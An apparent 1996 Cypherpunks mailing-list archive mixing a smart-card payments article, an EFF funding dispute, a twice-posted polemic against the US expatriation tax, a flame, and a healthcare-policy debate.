a small radio transmitter or a stripe that can be read with a quick swipe, are considered more appropriate. "A contact smart card in a mass transit environment is just too slow," says John Hall, general manager for retail banking services for the Credit Union Services Corp. of Australia.
The biggest problem of all, however, is ensuring the smart card makes financial sense. "The reason for all these projects is that no one has proven the business case. I'll be really interested to see if anyone makes money out of this," says Eugene Lockhart, president and chief executive of MasterCard International. The business case for the smart card has receded because telecommunications charges that once made online verification expensive are now coming down, and with them fraud rates. "Ten years ago you could justify the wallet on the basis that it would cut costs," says Peter Hirsch, managing director of consultants Retail Banking Research. "But now telecommunication costs are coming down and the business case is getting weaker. The chip is too expensive to give short-term returns." But at about US$ 14 apiece, a smart electronic wallet -- though more expensive than a magnetic stripe card -- is not completely devoid of financial advantages. Cash, which the wallet would partly displace, is expensive. The Association of Payment Clearing Services in London estimates that handling cash costs the British financial services industry about US$ 4.24 billion a year. For banks, the wallet could offer the chance to undo some of their past mistakes. In Australia, for example, the banks have pressed cards so far that they are being used for much lower value purchases than banks would like. "We don't think much of paying 20 cents to process a 95 cents transaction at McDonald's," says Hall of the Australian credit unions. For merchants, the replacement of cash means the elimination of considerable hassle. "If you take cash, you have to take it home, count it, put it into a night safe and then pay it into the bank the next day," says Richard Jackson, manager of Victoria News in Swindon, which accepts the Mondex card. But many retailers are likely to resist paying for the "privilege" of accepting the wallets. 
"Of course, there will be tough negotiations between individual banks and retailers," says Ron Clark, chief executive of Mondex in Britain. "We had this battle over Switch [the British debit card brand] with retailers who said they wanted us to provide it for free. But over time they have paid for it because it is a business proposition." Consumers, on the other hand, may prove much more difficult to convince that an electronic wallet is worth paying for when they can get cash for free. But Transcard charges US$ 7.82 a card, and says customers gladly pay it because the cost is covered within two weeks by the free bus rides they earn through a loyalty bonus scheme. "We have categorically proved that the consumer will pay," said David MacSmith, managing director of Card Technologies Australia. But it still may be difficult to persuade consumers to abandon cash altogether. "We are going to have a migration period of at least 10 years," said Lockhart of MasterCard. It will take even longer for more technologically advanced developments like the retina scan to move out of the film world into the marketplace. Richard Tyson-Davies, director-general of Apacs said: "The card is one of the most standardized items in the world. It is tremendously accepted and recognized so it would be a very bold person who threw that away." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mpd at netcom.com Tue Sep 17 18:30:44 1996 From: mpd at netcom.com (Mike Duvos) Date: Wed, 18 Sep 1996 09:30:44 +0800 Subject: Child pornography -- Expert witness for Federal jury trial Message-ID: <199609171941.MAA09023@netcom17.netcom.com> A Cyber-Liberties Advocate writes: > I just got a call from two Federal Public Defenders whose client is > charged with possession of child pornography stored in the /tmp > directory of a Unix system, in a zip'd file. 
(These lawyers seem to be > reasonably cyber-savvy, and told me they're following what I've been > writing about cyber-liberties.) Is this the Leachman/UPitt thing? --- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From mech at eff.org Tue Sep 17 18:31:57 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 18 Sep 1996 09:31:57 +0800 Subject: Why organizations turn statist. In-Reply-To: <199609150312.UAA02749@dns2.noc.best.net> Message-ID: <199609172104.OAA12280@eff.org> James A. Donald typed: > The EFF is ultimately a business lobby group, because it gets > most of its funding from businesses. Faulty logic. A does not follow from B. I have news for you: Most nonprofits get most of their funding from businesses. In some cases, corporations offer funding because the organization exists to represent their corporate donors (such things are variously called industry associations, trade groups, and in some cases PACs.) Others give to organizations that are centered on a written mission statement, rather than on the flexible interests of the donors, and they give because it 1) improves their market or customer base in various ways, and 2) allows them to claim philanthropy and charity, which are marketable traits. There's a very large difference between organizations that exist to represent the interests of members and donors, whatever those interests happen to be at the moment, and organizations with specific mission statements. It doesn't do well to confuse the two. It's the difference between the Business Software Alliance and the Free Software Foundation, between the Telephone Association of America and Voters' Telecom Watch. > It is therefore potentially > subject to the same corruption as other business lobbies. This is assumption not fact. The facts are that EFF accepts donations from companies that support our mission. If they expect to get some kind of trade association style "representation" for that, they are deluded.
What they get is our work to help the Net grow and flourish, which is good for their business. That's the perq they get. Nothing else. If you don't believe this, I invite you to ask all of the RBOCs whether they give us money any more. They used to, but didn't listen and expected us to act like their PAC, particularly on Digital Telephony. Instead of fighting for RBOCs' "rights" we fought for YOURS. They don't fund us any more. We don't care. Our mission doesn't bend to attract funders. It's stayed the same since day one. You may think EFF didn't do a good job on DigTel, but we didn't do Bell Atlantic's dance, that's for sure. And why don't you ask our boardmember Tim O'Reilly whether EFF has asked him to stop combatting Microsoft attempts to license how many IP connections people can make with NT Server, because it hurts our chances of getting money from Bill Gates. EFF has certainly been *pressured* to behave like a PAC, and this was one of our many reasons for leaving DC. It became increasingly difficult to fund a DC-based organization that was *not* a membership-controlled lobbying organization. We're betting on one thing: That the software, online commerce, and related industries, centered on Silicon Valley, can be dragged into the politics that are threatening to stomp them. It's been observed multiple times by several commentators that some key differences between this industry and older industries are 1) lack of philanthropy - almost no charitable organization support is seen from the computer industry at all, and 2) participation in the political process - there really hasn't been much action of any kind from the computer industry in legislative or legal issues in general, only on specific stuff like their particular intellectual property rights, even though some of the political issues cropping up on the Hill threaten their entire market.
Most analysis concludes that these two lacking features are due to youth of the industry, and lack of anyone pushing them into action. So, we're pushing. If we fail, we won't be here in 1997. EFF does not want to be a PAC. We *can't* be a PAC. We don't have the necessary skill set (we have a membership coordinator, we have civil liberties attorneys, etc. We do not have professional lobbyists, nor do we have an on-staff media and PR communicator, as some examples.) We'd like to see the industry recognize that what we're doing is vital for them, and to support it, but also to get their own trade associations going and working and actually engaged in the political process (for one thing, that further reduces any desire to try to get EFF to play that role, which we will not do. Less wasted time and effort pushing us, and less of the same from us pushing back.) I hope this explains the situation fairly clearly. > To be a successful lobby group, the EFF needs to get its > fingerprints on legislation, so that it can make threats and > promises to businessmen in the computer industry. EFF isn't interested in being "a successful lobby group". That's CDT's job. You may have missed some of the history here: CDT's core staff is our former policy staff. They split off because they wanted to do lobbying work, and EFF didn't. > Our interests, and the EFF's interest are opposed with no > apparent mutual good possible. That's absurd. I suppose you think ITAR and the CDA are good things? If not, then our work to defeat them is mutual good. > In order to be well funded, the EFF needs government > regulation of the net. The kind of regulation that would be That's absurd, too. I suppose there's a hidden grain of logic there: EFF would have little or no reason to exist without some kind of bad action on the part of government when it comes to the Net. This is true. We all would be really happy if that weren't the case and there was no need for an EFF. 
The day the government stops censoring and EFF can go away will be the happiest day of my life if it ever happens. Hell, I could be making 3x my current salary in the commercial sector. If you think I do this because I enjoy working 12 hour days fighting the largest government on earth, for a paycheck that only barely covers the bills, you have another think coming. At any rate, there is no logical connection whatsoever between the grain of truth here, and your conclusion (that EFF must be working to *increase* government control to keep itself alive). There are many assumptions that one is required to make before arrival at that conclusion from the data, and some of these conclusions are not only contradictory, but precluded by other observable facts. [...] > most effective in ensuring large donations would be regulation > that compels internet businessmen to lobby the government. > for example regulations that make impossible, inconsistent, and > contradictory requirements on those who provide software, [...] In other words you are claiming EFF authored the Communications Decency Act? [...] > of business, for example legislation that requires case > by case approval of software, or legislation that compels > the businessman to invade his customers privacy, and also > prohibits him from invading that privacy unless he has a > waiver issued by the state. In other words, you are claiming EFF is not really behind the Bernstein v. US Dept. of State suit to get rid of the only existing US "legislation that requires case by case approval of software"? -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From tdell at netscape.com Tue Sep 17 18:33:13 1996 From: tdell at netscape.com (Thomas Dell) Date: Wed, 18 Sep 1996 09:33:13 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: Message-ID: <323F13CA.7523@netscape.com> > Needless to say, I despise the idea of a "wealth tax," and I can > see various loopholes and workarounds. I'd also expect a lot of > folks to simply move out of the country if this were to happen. Not without difficulty. While this is not from a reliable source, it does seem that the gov't is aware of this issue. Tom tdell at netscape.com Subject: The Expat Tax Is Law - The Door Is Now Closed! Date: 16 Sep 1996 18:38:52 -0700 From: taxhaven at ix.netcom.com (Adam Starchild) Reply-To: privacy at ftc.gov The Expat Tax Is Law - The Door Is Now Closed! by Marc M. Harris After last year's failed attempt to pass an American expatriate tax, the U.S. Treasury Department succeeded in sneaking the provisions into the miscellaneous revenue positions of the recently passed Health Coverage Availability and Affordability Act of 1996. Given the failure of their high profile campaign last year, the Treasury Department switched strategies this year and undertook one of stealth. While the press was talking about tax-deductible contributions to medical savings accounts (MSAs), provisions tightening the expatriation tax rules were implemented. Foreign grantor trust rules were also tightened under the law. In order to provide the health insurance and care benefits provided under the law, a separate tax title adds certain revenue raising provisions. In general, these revenue offsets add provisions aimed at making certain the United States get their fair share plus some when U.S. citizens and permanent residents expatriate. In short, Uncle Sam would like to tell its expatriates that they earned their money from the United States, not in it. 
A review of selected sections of the Congressional Record provides some additional insight into the thinking behind these new provisions. "It has come to the attention of Congress that some very wealthy individuals have been relinquishing their citizenship to avoid U.S. income, estate and gift tax. The bill does not want to discourage citizens from exercising their right to expatriate, but does not want to provide a tax incentive for such an action..." If Congress truly wanted to eliminate the incentive for expatriation, it might be better to eliminate high taxation and put an end to the litigation crisis rather than creating another layer of government regulation and bureaucracy. "Congress believes the changes are consistent with existing tax treaties in conferring a tax credit for taxes paid in the foreign country, and to the extent they are inconsistent, the Treasury Department will re-negotiate the treaties to account for the changes. The new provisions take precedence over any treaties..." To make certain that other countries will not benefit from America's brain drain, the United States will once again embark on a campaign to bully other nations into accepting America's oppressive system of taxation and regulation. "This bill would subject former citizens to the expatriation provisions with no inquiry into their motive and requires individuals who exchange property that would otherwise be exempt from U.S. taxation as foreign source income must immediately recognize U.S. source income on any gain from such a transaction. The Secretary is authorized to issue regulations to treat removal of tangible property from the U.S. and other conversions to foreign source income. For example, any income from stock transferred to a foreign source, such as dividends, would be converted to U.S. source and immediately taxed..." Logic dictates that if this tax were to approach 100%, it would look quite similar to currency controls and foreign investment prohibitions. 
Since it only goes about half of the way, we can assume that we are 50% down the road toward American currency and foreign investment controls. "A new information reporting requirement has been added requiring former citizens and long-term residents to complete information reporting at the time of expatriation..." Just to make certain that no one escapes from the United States without leaving all their wealth behind, the new information reporting requirements will make certain that the Treasury Department always knows where your assets are placed. Of course, if you fail to report, civil and criminal sanctions will apply. The new treaty negotiations will most likely include provisions to extradite those "expat tax evaders" back home for their "criminal act" of leaving a country that was once known as the home of the free. Our sources at the Internal Revenue Service tell us this treaty provision will be known as the Hotel California provision -- you can check out, but you can never leave. "The bill also requires that a U.S. person that receives a distribution from a trust must report that to the Service..." Now Uncle Sam is not only seeking to penalize those patriots that have placed their funds out of harm's way, but now the potential recipients of those receipts. If the logic of current money laundering statutes apply as they do in most tax cases, the bank that accepts the cashing of the beneficiary's distribution check from a foreign trust will be a co-conspirator in this "unpatriotic" affair. "Effective for transfers made after February 6, 1995, if a non-resident alien becomes a resident within five years of transferring property to a foreign trust, the transferor will be considered to have transferred the property on the date he became a resident..." The Statue of Liberty stands as America's great symbol of open immigration with its famous inscription "give us your tired and poor." 
With this provision, any person who hopes to emigrate to the United States will definitely become tired of complying with U.S. regulations and poor after he complies with them. "If a U.S. person receives more than $10,000 worth of gifts from one foreign person during any tax year, he must file a report with the Service. If he fails to file a report, the Service has the sole discretion to determine the taxation of the property received by the U.S. person and the person is liable for a penalty of 5 percent of the value of the gift for each month he fails to file a report..." Currency controls and foreign investment restrictions work both ways. Not only will governments prevent you from sending your money out, but they will also prevent you from sending your money in without their fair share plus some. "The Service has the power to prescribe regulations to prevent the avoidance of the Estate, Trust and Beneficiary part of the Code..." This provision is known as an Abusive Transaction provision. It is commonly referred to by international human rights organizations as the arbitrary and capricious application of laws. "Once the Secretary of the Treasury establishes a reasonable belief that the expatriate's loss of U.S. citizenship would result in a substantial reduction in estate, inheritance, legacy, and succession taxes, the burden of proving that one of the principal purposes of the loss of U.S. citizenship was not avoidance of U.S. income or estate tax is on the executor of the decedent's estate..." If these provisions were making you feel a bit suicidal, please forget it. Uncle Sam is not only going to pursue you to the grave, but also your executors and heirs. Other items in the Congressional Record provide an even greater insight into Washington's motivations: "Because U.S. 
citizens who retain their citizenship are subject to income tax on accrued appreciation when they dispose of their assets, as well as estate tax on the full value of assets that are held until death, the Committee believes it fair and equitable to tax expatriates on the appreciation in their assets when they relinquish their U.S. citizenship. The Committee believes that an exception from the expatriation tax should be provided for individuals whose income and net worth are relatively modest..." If you are poor, you may leave; however, if you were a productive American in the United States that no longer exists, you must stay and pay or leave behind the fruits of your productivity. America's Second Civil War has begun and it is known as Class Warfare. "Exceptions from the expatriation tax are provided for individuals. (An) exception applies to a U.S. citizen who relinquishes citizenship before reaching age 18-1/2, provided that the individual was a resident of the United States for no more than 5 taxable years before such relinquishment..." Since one cannot renounce their American citizenship prior to their 18th birthday, the children of an American resident overseas have only 6 months to renounce their citizenship and avoid the application of these laws. How many 18 year olds are capable of making this type of decision? "Under the provision, an individual is permitted to elect to defer payment of the expatriation tax with respect to the deemed sale of any property. Under this election, the expatriation tax with respect to a particular property, plus interest thereon, is due when the property is subsequently disposed of. In order to elect deferral of the expatriation tax, the individual is required to provide adequate security to ensure that the deferred expatriation tax and interest ultimately will be paid... 
In the event that the security provided with respect to a particular property subsequently becomes inadequate and the individual fails to correct such situation, the deferred expatriation tax and interest with respect to such property becomes due. As a further condition to making this election, the individual is required to consent to the waiver of any treaty rights that would preclude the collection of the expatriation tax." Only in Congress could one dream of a law that requires its former citizens to waive their rights in a foreign country in order to escape from the political, social, and economic tyranny of the United States. "Under the provision, special rules apply to trust interests held by the individual at the time of relinquishment of citizenship or termination of residency. In addition, an individual who holds (or who is treated as holding) a trust interest at the time of relinquishment of citizenship or termination of residency is required to disclose on his or her tax return the methodology used to determine his or her interest in the trust, and whether such individual knows (or has reason to know) that any other beneficiary of the trust uses a different method..." The latter provision is known as the "Stool Pigeon" clause - - you are required to turn your fellow beneficiaries over to the Internal Revenue Service. Similar laws existed in Nazi Germany that encouraged children to turn their parents and neighbors over to the authorities. "If the individual holds an interest in a trust that is not a qualified trust, a special rule applies for purposes of determining the amount of the expatriation tax due with respect to such trust interest. Such separate trust is treated as having sold its assets as of the date of relinquishment of citizenship or termination of residency and having distributed all proceeds to the individual, and the individual is treated as having recontributed such proceeds to the trust. 
The individual is subject to the expatriation tax with respect to any net income or gain arising from the deemed distribution from the trust. A beneficiary's interest in a non-qualified trust is the basis of all facts and circumstances. If the individual has an interest in a qualified trust, a different set of rules applies. In determining this amount, all contingent and discretionary interests are resolved in the individual's favor (i.e. the individual is allocated the maximum amount that he or she potentially could receive under the terms of the trust instrument)..." The United States is quite generous in calculating the tax based on the maximum possible distribution. In their arrogance, it appears that the law does not detail how to recover the excess tax if the maximum level is never reached. Alternatively, Congress never intended for former Americans to comply with this law. "If the individual does not agree to such a waiver of treaty rights, the tax with respect to distributions to the individual is imposed on the trust, the trustee is personally liable therefor, and any other beneficiary of the trust will have a right of contribution against such individual with respect to such tax." Based on the above, no foreign financial institution with offices or business in the United States would accept the trusteeship of an American's assets. "Under the provision, an individual is permitted to make an irrevocable election to continue to be taxed as a U.S. citizen with respect to all property that otherwise is covered by the expatriation tax. This election is an "all- or-nothing" election;..." Congress is quite generous with this provision in allowing expatriating Americans to continue being chased by tax collectors for the rest of their lives overseas. "Under the provision, an individual is treated as having relinquished U.S. citizenship on the date that the individual first makes known to a U.S. government or consular officer his or her intention to relinquish U.S. 
citizenship... A U.S. citizen who furnishes to the State Department a signed statement of voluntary relinquishment of U.S. nationality, confirming the performance of an expatriating act with the requisite intent to relinquish his or her citizenship is treated as having relinquished his or her citizenship on the date the statement is so furnished (regardless of when the expatriating act was performed), provided that the voluntary relinquishment is later confirmed by the issuance of a CLN (Certificate of Loss of Nationality). If neither of these circumstances exist, the individual is treated as having relinquished citizenship on the date a CLN is issued or a certificate of naturalization is cancelled. The date of relinquishment of citizenship determined under the provision applies for all tax purposes..." Based on this provision, almost any American who now wishes to undertake the expatriation route will be subject to the tax. In short, the door has closed for most Americans. "Under the provision, the exclusion from income does not apply to the value of any property received by gift or inheritance from an individual who was subject to the expatriation tax. Accordingly, a U.S. taxpayer who receives a gift or inheritance from such an individual is required to include the value of such gift or inheritance in gross income and is subject to U.S. income tax on such amount..." This implies that if an American expatriate sends funds back to support his aging parents, his parents will need to treat these gifts as taxable income. If the parents fail to report these amounts, they could also suffer civil and criminal penalties associated with tax evasion. 
"Under the provision, an individual who relinquishes citizenship or terminates residency is required to provide a statement which includes the individual's social security number, forwarding foreign address, new country of residence and citizenship and, in the case of individuals with a net worth of at least $500,000, a balance sheet..." Given the desire to obtain balance sheets from expatriating Americans, it is only a matter of time before the IRS requires the inclusion of personal balance sheets of individual taxpayers with their Form 1040s or at least those they suspect might wish to expatriate. "In the case of a former citizen, such statement is due not later than the date the individual's citizenship is treated as relinquished and is provided to the State Department..." In short, this means that you cannot obtain your certificate of loss of nationality without providing the information to the United States government. "Further, the provision requires the Secretary of the Treasury to publish in the Federal Register the names of all former U.S. citizens with respect to whom it receives the required statements or whose names it receives under the foregoing information-sharing provisions..." Now your friends and neighbors can know that you have expatriated. Although Congress respects the right of Americans to expatriate, it will publish your name in the federal register as if expatriation were a criminal act. "The provision directs the Treasury Department to undertake a study on the tax compliance of U.S. citizens and green-card holders residing outside the United States and to make recommendations regarding the improvement of such compliance. The findings of such study and such recommendations are required to be reported to the House Committee on Ways and Means and the Senate Committee on Finance within 90 days of the date of enactment..." 
Uncle Sam has awoken to the fact that most Americans living overseas are the most likely individuals to expatriate and as a result, they are gearing up to create a machine to attack them as well. The provision is effective for U.S. citizens whose date of relinquishment of citizenship (as determined under the provision occurred on or after February 6, 1995. U.S. citizens who committed an expatriating act with the requisite intent to relinquish their U.S. citizenship prior to February 6, 1995, but whose date of relinquishment of citizenship (as determined under the provision) does not occur until after such date, are subject to the expatriation tax..." This means that if you have not already relinquished your citizenship or have only done so recently, you are subject to the expat tax. The door has closed, but not completely. About the Author Marc M. Harris is a certified public accountant and president of The Harris Organization. He has already developed a strategy for legally avoiding the expat tax, which he discusses only in personal appointments. Copyright 1996 by Marc M. Harris ----------------------------------------------------------------- Posted by Adam Starchild The Offshore Entrepreneur at http://www.au.com/offshore The privacy list is run automatically by the Majordomo list manager. Send a "help" command to majordomo at ftc.gov for assistance. 
From andrew_loewenstern at il.us.swissbank.com Tue Sep 17 19:01:17 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 18 Sep 1996 10:01:17 +0800 Subject: "Get a fucking life" (was Re: Diffie Hellman - logs in Galois fields) In-Reply-To: <842988785.23058.0@fatmans.demon.co.uk> Message-ID: <9609172145.AA00585@ch1d157nwk> Paul Bradley (paul at fatmans.demon.co.uk) foams at the mouth: > Get a fucking life, seeing as you haven`t yet posted anything > relating remotely to the technical aspects of cryptography to > this list I think you need to take a long hard look at what > your saying loser.... Hey folks, when it is so obvious that someone is a loser that "Get a fucking life" flows so easily out of your keyboard, then there is no reason to post such missives publicly. Just plonk'em and forget'em ... those of us who have already done so don't want to read this dreck either. andrew From jbugden at smtplink.alis.ca Tue Sep 17 19:03:32 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Wed, 18 Sep 1996 10:03:32 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... Message-ID: <9608178430.AA843010044@smtplink.alis.ca> Black Unicorn wrote: >On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: >> Black Unicorn >> >You are saying that everyone on the planet has a right to health >> > insurance and disability insurance whether they can afford it or not. >> > This is folly. The result is serious moral hazard problems. >> >> Almost, but not quite. I'm saying that within our two countries at least >> (Canada, U.S.) everyone could have access to medically necessary >> procedures because the *society as a whole* can afford it. > >The decisions about what is or is not medically necessary must by >design be made by government in a socialized medicine regime. People do make decisions that affect other people. If you feel safer in the good hands of Allstate than at the government trough, good for you. 
Personally, I trust in Allah, but I still tie up my camel. > This evades an important point as well. Namely, who cares if society > can afford it? Some things are seen as investments in the future of a society. I view both Education and Health through this lens. >> But there is a balance between accurately pricing the risk and >> minimizing the cost of the bureaucracy that polices this pricing. > > Oh, I see. Let's give the program to the government then. Good idea. > That will reduce the cost of the bureaucracy. The point is still valid. Are we not trying to minimize this cost? >> There are also many ways to modify behaviour, not all of them direct. > > And all of them buy into the notion that people are not to be made > personally responsible for their high risk behavior. There it is again. Blame the sick for their lack of moral fibre. Not every victim of lung cancer smokes. Besides, people are notoriously poor at evaluating the probability of unlikely events (see reference below). A "punishment" that happens 30 years after the "crime" is no deterrent. Prevention is usually cheaper than treatment. > I prefer market solutions. I prefer solutions. James From tcmay at got.net Tue Sep 17 19:32:42 1996 From: tcmay at got.net (Tim May) Date: Wed, 18 Sep 1996 10:32:42 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! Message-ID: <199609171211.FAA02724@you.got.net> I'm forwarding this message to the list, as it relates to several themes we've been discussing recently. The imposition of draconian taxation policies effectively says that the U.S. is now doing what the Soviet Union did to emigrants: demand that they "pay back" various costs the government claimed they had incurred. Here, the U.S. 
is telling would-be expats that they cannot take their property with them, that they must effectively "escrow" (there's that horrid word again) their assets in a form and place that the tax collector can access, even if they no longer live in the United States and no longer use services, and even if they had paid their full taxes on income while they _were_ in the U.S. It makes me want to just put my stock certificates in my luggage and just drive on down to Mexico and cross the border (no border checks) and go from there to some safer haven. (However, I imagine the Feds can effectively block sales of my stock--the stock is still formally only an accounting entry, as stock certificates are not "bearer instruments." I could probably relocate to a foreign haven and sell the assets before the IRS would even notice...unless they computerize. I suspect this is coming.) Anyway, here's the article: > From: taxhaven at ix.netcom.com(Adam Starchild) > Newsgroups: alt.privacy > Subject: The Expat Tax Is Law - The Door Is Now Closed! > Date: 17 Sep 1996 01:30:43 GMT > Message-ID: <51kv03$d82 at dfw-ixnews5.ix.netcom.com> > > The Expat Tax Is Law - The Door Is Now Closed! > > by > > Marc M. Harris > > After last year's failed attempt to pass an American > expatriate tax, the U.S. Treasury Department succeeded in > sneaking the provisions into the miscellaneous revenue positions > of the recently passed Health Coverage Availability and > Affordability Act of 1996. Given the failure of their high > profile campaign last year, the Treasury Department switched > strategies this year and undertook one of stealth. While the > press was talking about tax-deductible contributions to medical > savings accounts (MSAs), provisions tightening the expatriation > tax rules were implemented. Foreign grantor trust rules were > also tightened under the law. 
> In order to provide the health insurance and care benefits > provided under the law, a separate tax title adds certain revenue > raising provisions. In general, these revenue offsets add > provisions aimed at making certain the United States get their > fair share plus some when U.S. citizens and permanent residents > expatriate. In short, Uncle Sam would like to tell its > expatriates that they earned their money from the United States, > not in it. > A review of selected sections of the Congressional Record > provides some additional insight into the thinking behind these > new provisions. > > "It has come to the attention of Congress that some > very wealthy individuals have been relinquishing their > citizenship to avoid U.S. income, estate and gift tax. The > bill does not want to discourage citizens from exercising > their right to expatriate, but does not want to provide a > tax incentive for such an action..." > > If Congress truly wanted to eliminate the incentive for > expatriation, it might be better to eliminate high taxation and > put an end to the litigation crisis rather than creating another > layer of government regulation and bureaucracy. > > "Congress believes the changes are consistent with > existing tax treaties in conferring a tax credit for taxes > paid in the foreign country, and to the extent they are > inconsistent, the Treasury Department will re-negotiate the > treaties to account for the changes. The new provisions > take precedence over any treaties..." > > To make certain that other countries will not benefit from > America's brain drain, the United States will once again embark > on a campaign to bully other nations into accepting America's > oppressive system of taxation and regulation. > > "This bill would subject former citizens to the > expatriation provisions with no inquiry into their motive > and requires individuals who exchange property that would > otherwise be exempt from U.S. 
taxation as foreign source > income must immediately recognize U.S. source income on any > gain from such a transaction. The Secretary is authorized > to issue regulations to treat removal of tangible property > from the U.S. and other conversions to foreign source > income. For example, any income from stock transferred to a > foreign source, such as dividends, would be converted to > U.S. source and immediately taxed..." > > Logic dictates that if this tax were to approach 100%, it > would look quite similar to currency controls and foreign > investment prohibitions. Since it only goes about half of the > way, we can assume that we are 50% down the road toward American > currency and foreign investment controls. > > "A new information reporting requirement has been added > requiring former citizens and long-term residents to > complete information reporting at the time of > expatriation..." > > Just to make certain that no one escapes from the United > States without leaving all their wealth behind, the new > information reporting requirements will make certain that the > Treasury Department always knows where your assets are placed. > Of course, if you fail to report, civil and criminal sanctions > will apply. The new treaty negotiations will most likely include > provisions to extradite those "expat tax evaders" back home for > their "criminal act" of leaving a country that was once known as > the home of the free. Our sources at the Internal Revenue > Service tell us this treaty provision will be known as the Hotel > California provision -- you can check out, but you can never > leave. > > "The bill also requires that a U.S. person that > receives a distribution from a trust must report that to the > Service..." > > Now Uncle Sam is not only seeking to penalize those patriots > that have placed their funds out of harm's way, but now the > potential recipients of those receipts. 
If the logic of current > money laundering statutes apply as they do in most tax cases, the > bank that accepts the cashing of the beneficiary's distribution > check from a foreign trust will be a co-conspirator in this > "unpatriotic" affair. > > "Effective for transfers made after February 6, 1995, > if a non-resident alien becomes a resident within five years > of transferring property to a foreign trust, the transferor > will be considered to have transferred the property on the > date he became a resident..." > > The Statue of Liberty stands as America's great symbol of > open immigration with its famous inscription "give us your tired > and poor." With this provision, any person who hopes to emigrate > to the United States will definitely become tired of complying > with U.S. regulations and poor after he complies with them. > > "If a U.S. person receives more than $10,000 worth of > gifts from one foreign person during any tax year, he must > file a report with the Service. If he fails to file a > report, the Service has the sole discretion to determine the > taxation of the property received by the U.S. person and the > person is liable for a penalty of 5 percent of the value of > the gift for each month he fails to file a report..." > > Currency controls and foreign investment restrictions work > both ways. Not only will governments prevent you from sending > your money out, but they will also prevent you from sending your > money in without their fair share plus some. > > "The Service has the power to prescribe regulations to > prevent the avoidance of the Estate, Trust and Beneficiary > part of the Code..." > > This provision is known as an Abusive Transaction provision. > It is commonly referred to by international human rights > organizations as the arbitrary and capricious application of > laws. > > "Once the Secretary of the Treasury establishes a > reasonable belief that the expatriate's loss of U.S. 
> citizenship would result in a substantial reduction in > estate, inheritance, legacy, and succession taxes, the > burden of proving that one of the principal purposes of the > loss of U.S. citizenship was not avoidance of U.S. income or > estate tax is on the executor of the decedent's estate..." > > If these provisions were making you feel a bit suicidal, > please forget it. Uncle Sam is not only going to pursue you to > the grave, but also your executors and heirs. > > Other items in the Congressional Record provide an even > greater insight into Washington's motivations: > > "Because U.S. citizens who retain their citizenship are > subject to income tax on accrued appreciation when they > dispose of their assets, as well as estate tax on the full > value of assets that are held until death, the Committee > believes it fair and equitable to tax expatriates on the > appreciation in their assets when they relinquish their U.S. > citizenship. The Committee believes that an exception from > the expatriation tax should be provided for individuals > whose income and net worth are relatively modest..." > > If you are poor, you may leave; however, if you were a > productive American in the United States that no longer exists, > you must stay and pay or leave behind the fruits of your > productivity. America's Second Civil War has begun and it is > known as Class Warfare. > > "Exceptions from the expatriation tax are provided for > individuals. (An) exception applies to a U.S. citizen who > relinquishes citizenship before reaching age 18-1/2, > provided that the individual was a resident of the United > States for no more than 5 taxable years before such > relinquishment..." > > Since one cannot renounce their American citizenship prior > to their 18th birthday, the children of an American resident > overseas have only 6 months to renounce their citizenship and > avoid the application of these laws. How many 18 year olds are > capable of making this type of decision? 
> > "Under the provision, an individual is permitted to > elect to defer payment of the expatriation tax with respect > to the deemed sale of any property. Under this election, > the expatriation tax with respect to a particular property, > plus interest thereon, is due when the property is > subsequently disposed of. In order to elect deferral of the > expatriation tax, the individual is required to provide > adequate security to ensure that the deferred expatriation > tax and interest ultimately will be paid... In the event > that the security provided with respect to a particular > property subsequently becomes inadequate and the individual > fails to correct such situation, the deferred expatriation > tax and interest with respect to such property becomes due. > As a further condition to making this election, the > individual is required to consent to the waiver of any > treaty rights that would preclude the collection of the > expatriation tax." > > Only in Congress could one dream of a law that requires its > former citizens to waive their rights in a foreign country in > order to escape from the political, social, and economic tyranny > of the United States. > > "Under the provision, special rules apply to trust > interests held by the individual at the time of > relinquishment of citizenship or termination of residency. > In addition, an individual who holds (or who is treated as > holding) a trust interest at the time of relinquishment of > citizenship or termination of residency is required to > disclose on his or her tax return the methodology used to > determine his or her interest in the trust, and whether such > individual knows (or has reason to know) that any other > beneficiary of the trust uses a different method..." > > The latter provision is known as the "Stool Pigeon" clause - > - you are required to turn your fellow beneficiaries over to the > Internal Revenue Service. 
Similar laws existed in Nazi Germany > that encouraged children to turn their parents and neighbors over > to the authorities. > > "If the individual holds an interest in a trust that is > not a qualified trust, a special rule applies for purposes > of determining the amount of the expatriation tax due with > respect to such trust interest. Such separate trust is > treated as having sold its assets as of the date of > relinquishment or citizenship or termination of residency > and having distributed all proceeds to the individual, and > the individual is treated as having recontributed such > proceeds to the trust. The individual is subject to the > expatriation tax with respect to any net income or gain > arising from the deemed distribution from the trust. A > beneficiary's interest in a non-qualified trust is the basis > of all facts and circumstances. If the individual has an > interest in a qualified trust, a different set of rules > applies. In determining this amount, all contingent and > discretionary interests are resolved in the individual's > favor (i.e. the individual is allocated the maximum amount > that he or she potentially could receive under the terms of > the trust instrument)..." > > The United States is quite generous in calculating the tax > based on the maximum possible distribution. In their arrogance, > it appears that the law does not detail how to recover the excess > tax if the maximum level is never reached. Alternatively, > Congress never intended for former Americans to comply with this > law. > > "If the individual does not agree to such a waiver of > treaty rights, the tax with respect to distributions to the > individual is imposed on the trust, the trustee is > personally liable therefor, and any other beneficiary of the > trust will have a right of contribution against such > individual with respect to such tax." 
